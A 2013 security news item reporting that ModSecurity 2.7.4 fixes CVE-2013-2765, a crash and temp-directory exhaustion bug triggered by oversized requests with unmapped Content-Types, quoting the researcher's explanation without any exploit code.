ModSecurity Firewall Hole Fixed

Wednesday, May 29, 2013 @ 12:05 PM gHale


The open source web application firewall ModSecurity development team fixed a vulnerability that could help attackers break through the barrier.

Using a crafted HTTP request to execute the action forceRequestBodyVariable with an unknown content type resulted in a null pointer dereference.

The problem, the developers said, could end up fixed by updating to version 2.7.4, which also fixes a number of other bugs and utilizes libinjection to identify SQL injection attacks.

The developers also said the nginx port has now reached the level where it is a stable version.

Younes Jaaidi, the researcher who discovered the vulnerability posted more details about the exploit, which been allocated the identifier CVE-2013-2765.

“When ModSecurity receives a request body with a size bigger than the value set by the ‘SecRequestBodyInMemoryLimit’ and with a ‘Content-Type’ that has no request body processor mapped to it, ModSecurity will systematically crash on every call to ‘forceRequestBodyVariable’ (in phase 1),” Jaaidi said in a blog posting.

“In addition to the segfault that occurs here, ModSecurity will not remove the temporary request body file and the temporary directory (set by the ‘SecTmpDir’ directive) will keep growing until saturation.

“As an example, in the latest core rule set (2.2.7), ‘forceRequestBodyVariable’ can be triggered by sending a POST request with some random “Content-Type” (rule 960010),” he said.

Jaaidi also released proof-of-concept code for the exploit on GitHub.



Leave a Reply

You must be logged in to post a comment.